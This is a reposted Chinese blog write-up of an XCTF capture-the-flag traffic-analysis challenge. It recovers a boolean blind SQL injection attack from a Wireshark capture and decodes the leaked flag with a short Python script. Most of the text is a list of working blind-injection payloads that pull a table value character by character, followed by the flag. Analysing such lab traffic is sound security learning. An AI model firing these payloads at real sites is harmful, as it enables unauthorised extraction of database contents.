首页 最新 热门 推荐

  • 首页
  • 最新
  • 热门
  • 推荐

攻防世界 - Misc - Level 1 | 流量分析

  • 25-02-16 17:41
  • 4203
  • 9557
blog.csdn.net

关注这个靶场的其它相关笔记:攻防世界(XCTF) —— 靶场笔记合集-CSDN博客

0x01:考点速览

本题考察的是 SQL 盲注中布尔盲注的流量分析,想要通过此关,你需要掌握以下技术:

  • 熟悉布尔盲注的攻击流出。

  • 会使用 WireShark 导出 HTTP 请求包列表,并依据大小进行排序

0x02:Write UP

题目描述写的很清楚,本题是个 SQL 注入的流量分析,从靶场下载下流量包后,搜索 flag:

知道了目标采用的是布尔盲注后,我们通过 http.request 筛选 HTTP 请求包,对于布尔盲注,攻击者肯对会发送大量的有规律的 HTTP 请求包来做测试:

布尔盲注攻击者肯定有个基准参数,来确定其是否攻击成功,我们找到攻击者切换攻击位置的地方即可:

我们追踪最后那个带有 11 的 HTTP 数据流,从页面中提取关键数据:

此时我们再看看 12 的那个 HTTP 数据流,明显看到攻击者攻击失败:

所以攻击者估计也是根据页面的这两个标志来判断自己布尔盲注是否成功的。所以接下来,我们只要定位攻击者每次切换攻击位置的数据包然后根据响应包中的关键字,即可判断攻击者是否攻击成功,并且拿到攻击者所获取的信息。

此时我们再拓展一下,页面返回包变了,对应的返回包大小是不是也变了。所以我们有一个快速的技巧,即通过 WireShark 导出 HTTP 响应包的长度进行排序查看:

经过筛选后,我们可以拿到如下关键请求信息:

  1.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),1,1))=102#
  2.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),2,1))=108#
  3.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),3,1))=97#
  4.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),4,1))=103#
  5.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),5,1))=123#
  6.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),6,1))=99#
  7.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),7,1))=50#
  8.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),8,1))=98#
  9.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),9,1))=98#
  10.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),10,1))=102#
  11.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),11,1))=57#
  12.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),12,1))=99#
  13.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),13,1))=101#
  14.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),14,1))=99#
  15.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),15,1))=100#
  16.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),16,1))=97#
  17.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),17,1))=102#
  18.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),18,1))=54#
  19.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),19,1))=53#
  20.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),20,1))=54#
  21.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),21,1))=99#
  22.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),22,1))=102#
  23.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),23,1))=53#
  24.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),24,1))=50#
  25.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),25,1))=52#
  26.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),26,1))=100#
  27.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),27,1))=48#
  28.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),28,1))=49#
  29.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),29,1))=52#
  30.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),30,1))=99#
  31.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),31,1))=53#
  32.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),32,1))=98#
  33.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),33,1))=102#
  34.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),34,1))=48#
  35.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),35,1))=52#
  36.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),36,1))=54#
  37.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),37,1))=99#
  38.  /?id=1' and ascii(substring((select keyid from flag limit 0,1),38,1))=125#

可以通过下面这个脚本将每个攻击的结果转化为字符,并得到 Flag:

  1.  import re
  2.  import urllib
  3.  import urllib.parse
  4.  ​
  5.  string = """
  6.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),1,1))=102%23
  7.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),2,1))=108%23
  8.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),3,1))=97%23
  9.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),4,1))=103%23
  10.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),5,1))=123%23
  11.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),6,1))=99%23
  12.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),7,1))=50%23
  13.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),8,1))=98%23
  14.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),9,1))=98%23
  15.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),10,1))=102%23
  16.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),11,1))=57%23
  17.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),12,1))=99%23
  18.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),13,1))=101%23
  19.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),14,1))=99%23
  20.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),15,1))=100%23
  21.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),16,1))=97%23
  22.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),17,1))=102%23
  23.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),18,1))=54%23
  24.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),19,1))=53%23
  25.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),20,1))=54%23
  26.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),21,1))=99%23
  27.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),22,1))=102%23
  28.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),23,1))=53%23
  29.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),24,1))=50%23
  30.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),25,1))=52%23
  31.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),26,1))=100%23
  32.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),27,1))=48%23
  33.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),28,1))=49%23
  34.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),29,1))=52%23
  35.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),30,1))=99%23
  36.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),31,1))=53%23
  37.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),32,1))=98%23
  38.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),33,1))=102%23
  39.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),34,1))=48%23
  40.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),35,1))=52%23
  41.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),36,1))=54%23
  42.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),37,1))=99%23
  43.  /?id=1'%20and%20ascii(substring((select%20keyid%20from%20flag%20limit%200,1),38,1))=125%23
  44.  """
  45.  ​
  46.  result = re.findall("\)\)=(\d*)?#", urllib.parse.unquote(string))
  47.  ​
  48.  for i in result:
  49.      print(chr(int(i)), end="")

最终得到的 Flag 如下:

 flag{c2bbf9cecdaf656cf524d014c5bf046c}
注:本文转载自blog.csdn.net的Blue17 :: Hack3rX的文章"https://blog.csdn.net/m0_73360524/article/details/144805609"。版权归原作者所有,此博客不拥有其著作权,亦不承担相应法律责任。如有侵权,请联系我们删除。
复制链接
复制链接
相关推荐
发表评论
登录后才能发表评论和回复 注册

/ 登录

评论记录:

未查询到任何数据!
回复评论:

分类栏目

后端 (14832) 前端 (14280) 移动开发 (3760) 编程语言 (3851) Java (3904) Python (3298) 人工智能 (10119) AIGC (2810) 大数据 (3499) 数据库 (3945) 数据结构与算法 (3757) 音视频 (2669) 云原生 (3145) 云平台 (2965) 前沿技术 (2993) 开源 (2160) 小程序 (2860) 运维 (2533) 服务器 (2698) 操作系统 (2325) 硬件开发 (2491) 嵌入式 (2955) 微软技术 (2769) 软件工程 (2056) 测试 (2865) 网络空间安全 (2948) 网络与通信 (2797) 用户体验设计 (2592) 学习和成长 (2593) 搜索 (2744) 开发工具 (7108) 游戏 (2829) HarmonyOS (2935) 区块链 (2782) 数学 (3112) 3C硬件 (2759) 资讯 (2909) Android (4709) iOS (1850) 代码人生 (3043) 阅读 (2841)

热门文章

101
推荐
关于我们 隐私政策 免责声明 联系我们
Copyright © 2020-2025 蚁人论坛 (iYenn.com) All Rights Reserved.
Scroll to Top